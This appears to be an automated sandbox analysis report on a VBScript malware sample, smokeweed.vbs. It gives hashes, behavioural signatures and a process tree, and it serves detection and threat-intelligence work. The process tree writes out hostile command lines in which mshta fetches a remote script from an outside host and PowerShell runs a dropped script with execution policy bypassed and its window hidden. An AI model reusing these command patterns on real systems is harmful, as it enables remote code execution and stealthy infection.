Analysis
-
max time kernel
24s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
26-02-2021 08:13
Static task
static1
Behavioral task
behavioral1
Sample
smokeweed.vbs
Resource
win7v20201028
General
-
Target
smokeweed.vbs
-
Size
3KB
-
MD5
07b8be238ea7e4d28ab60dd6c485f663
-
SHA1
73c2226a8592f0a729a837013d40e5b55ecb4415
-
SHA256
78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f
-
SHA512
9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 6 1760 mshta.exe 8 1760 mshta.exe 9 1680 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1680 set thread context of 1792 1680 powershell.exe jsc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 708 powershell.exe 708 powershell.exe 1680 powershell.exe 1680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exejsc.exedescription pid process Token: SeDebugPrivilege 708 powershell.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 1792 jsc.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exeWScript.exemshta.exepowershell.exedescription pid process target process PID 292 wrote to memory of 1440 292 WScript.exe WScript.exe PID 292 wrote to memory of 1440 292 WScript.exe WScript.exe PID 292 wrote to memory of 1440 292 WScript.exe WScript.exe PID 1440 wrote to memory of 1760 1440 WScript.exe mshta.exe PID 1440 wrote to memory of 1760 1440 WScript.exe mshta.exe PID 1440 wrote to memory of 1760 1440 WScript.exe mshta.exe PID 1760 wrote to memory of 708 1760 mshta.exe powershell.exe PID 1760 wrote to memory of 708 1760 mshta.exe powershell.exe PID 1760 wrote to memory of 708 1760 mshta.exe powershell.exe PID 1440 wrote to memory of 1680 1440 WScript.exe powershell.exe PID 1440 wrote to memory of 1680 1440 WScript.exe powershell.exe PID 1440 wrote to memory of 1680 1440 WScript.exe powershell.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe PID 1680 wrote to memory of 1792 1680 powershell.exe jsc.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate2⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
445e625b0e5c155c88686d118ea2bf81
SHA1a96aa3a608e8d51cc77f6fd26545fb1500fca707
SHA256db8990261e2fb46cafc5e008d7e50a0494d24ad666d31812137ad753250fa7fa
SHA5125850920b93438b970671038900c14663fb506e085c7acf5c3494059cc6114cc5ae2c8b468acc56dcb0be77adc3417a7206ee81a5614eac3cdc3a5118391f0e70
-
C:\Users\Public\Datax.ps1MD5
c85a52e535d54935f25bc43e8b393b1a
SHA1963baebff776005de53b5c68608c5c5205400b50
SHA2560545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753
SHA512729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184
-
memory/292-2-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmpFilesize
8KB
-
memory/292-4-0x00000000024A0000-0x00000000024A4000-memory.dmpFilesize
16KB
-
memory/708-11-0x000007FEF3D20000-0x000007FEF470C000-memory.dmpFilesize
9.9MB
-
memory/708-9-0x0000000000000000-mapping.dmp
-
memory/708-12-0x0000000001F10000-0x0000000001F11000-memory.dmpFilesize
4KB
-
memory/708-13-0x000000001A9E0000-0x000000001A9E1000-memory.dmpFilesize
4KB
-
memory/708-14-0x00000000022C0000-0x00000000022C1000-memory.dmpFilesize
4KB
-
memory/708-15-0x000000001A7E0000-0x000000001A7E2000-memory.dmpFilesize
8KB
-
memory/708-16-0x000000001A7E4000-0x000000001A7E6000-memory.dmpFilesize
8KB
-
memory/708-17-0x0000000002470000-0x0000000002471000-memory.dmpFilesize
4KB
-
memory/1352-8-0x000007FEF6A60000-0x000007FEF6CDA000-memory.dmpFilesize
2.5MB
-
memory/1440-19-0x0000000002560000-0x0000000002564000-memory.dmpFilesize
16KB
-
memory/1440-3-0x0000000000000000-mapping.dmp
-
memory/1680-24-0x000000001AC90000-0x000000001AC92000-memory.dmpFilesize
8KB
-
memory/1680-47-0x0000000002750000-0x0000000002751000-memory.dmpFilesize
4KB
-
memory/1680-22-0x000007FEF3D20000-0x000007FEF470C000-memory.dmpFilesize
9.9MB
-
memory/1680-28-0x000000001AC94000-0x000000001AC96000-memory.dmpFilesize
8KB
-
memory/1680-50-0x0000000002760000-0x0000000002766000-memory.dmpFilesize
24KB
-
memory/1680-30-0x000000001BA30000-0x000000001BA31000-memory.dmpFilesize
4KB
-
memory/1680-31-0x0000000002630000-0x0000000002631000-memory.dmpFilesize
4KB
-
memory/1680-34-0x0000000002700000-0x0000000002701000-memory.dmpFilesize
4KB
-
memory/1680-46-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/1680-18-0x0000000000000000-mapping.dmp
-
memory/1680-48-0x000000001BB00000-0x000000001BB01000-memory.dmpFilesize
4KB
-
memory/1680-49-0x000000001AC9A000-0x000000001ACB9000-memory.dmpFilesize
124KB
-
memory/1760-6-0x0000000000000000-mapping.dmp
-
memory/1792-51-0x0000000000400000-0x000000000045E000-memory.dmpFilesize
376KB
-
memory/1792-52-0x000000000045819E-mapping.dmp
-
memory/1792-53-0x00000000746C0000-0x0000000074DAE000-memory.dmpFilesize
6.9MB
-
memory/1792-54-0x0000000000400000-0x000000000045E000-memory.dmpFilesize
376KB
-
memory/1792-56-0x0000000004740000-0x0000000004741000-memory.dmpFilesize
4KB